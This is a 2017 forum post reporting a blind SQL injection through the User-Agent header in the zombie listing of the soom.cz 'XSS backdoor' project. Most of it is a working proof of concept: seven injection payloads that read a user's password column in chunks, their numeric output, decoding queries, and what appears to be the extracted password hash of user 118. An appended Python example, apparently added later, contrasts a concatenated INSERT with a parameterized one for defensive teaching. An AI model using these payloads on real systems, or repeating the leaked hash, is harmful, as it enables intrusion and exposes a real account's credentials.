SQLi - soom.cz (XSS backdoor project)
The XSS backdoor has an SQLi in the user agent, when the zombie listing is displayed. It is a BLIND SQLi in an INSERT. It is the same vulnerability that was present in the GET2MAIL project [link] and, back in 2014, in the Anonymity Checker [link].
PoC:
User agent:
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 1, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 5, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 10, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 15, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 20, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 25, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 30, 5)), 16, 10) * '1
Result:
435439560292
430372500326
430456452449
434617279540
219868837689
430321971302
55
To hex:
SELECT unhex(conv(435439560292, 10, 16));
SELECT unhex(conv(430372500326, 10, 16));
SELECT unhex(conv(430456452449, 10, 16));
SELECT unhex(conv(434617279540, 10, 16));
SELECT unhex(conv(219868837689, 10, 16));
SELECT unhex(conv(430321971302, 10, 16));
SELECT unhex(conv(55, 10, 16));
Result:
6562386664
6434333366
6439343561
6531356434
3331343739
6431303066
37
To ascii:
eb8fdd433fd945ae15d431479d100f7
Details:
[link] (reply) | Sinxteniyn | 193.171.202.* | 26.10.2017 12:58 |
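Added example, not part of the original post and not the project's own code: the class of bug reported above (a User-Agent header spliced into an INSERT and later shown in a listing), next to the parameterized form that closes it. Assumptions: SQLite stands in for the project's database, the `zombies` table, its `user_agent` column and the function names are hypothetical, and the secret and header value are constructed; only `users`, `heslo` and id 118 are taken from the post.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the application's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, heslo TEXT);
        CREATE TABLE zombies (id INTEGER PRIMARY KEY, user_agent TEXT);
        INSERT INTO users VALUES (118, 'constructed-secret');
    """)
    return db

def log_zombie_vulnerable(db, user_agent):
    # Header value is concatenated into the statement text, so a quote in the
    # header ends the string literal and the rest is parsed as SQL.
    db.execute("INSERT INTO zombies (user_agent) VALUES ('" + user_agent + "')")

def log_zombie_safe(db, user_agent):
    # Header value is bound as a parameter: it is only ever data, never SQL.
    db.execute("INSERT INTO zombies (user_agent) VALUES (?)", (user_agent,))

def listing(db):
    """What the zombie listing page would read back."""
    return [row[0] for row in db.execute("SELECT user_agent FROM zombies ORDER BY id")]

# Constructed header value with the same  1' * (subquery) * '1  shape as the
# post, reduced to the length of the stored value.
HEADER = "1' * (SELECT length(heslo) FROM users WHERE id=118) * '1"

def compare():
    """Return (vulnerable listing, safe listing) for the same header value."""
    vuln_db, safe_db = make_db(), make_db()
    log_zombie_vulnerable(vuln_db, HEADER)
    log_zombie_safe(safe_db, HEADER)
    return listing(vuln_db), listing(safe_db)

if __name__ == "__main__":
    vulnerable, safe = compare()
    print("concatenated INSERT stored:", vulnerable)
    print("parameterized INSERT stored:", safe)
```

With concatenation the listing shows a number computed from the `users` table; with a bound parameter it shows the header text exactly as it was sent.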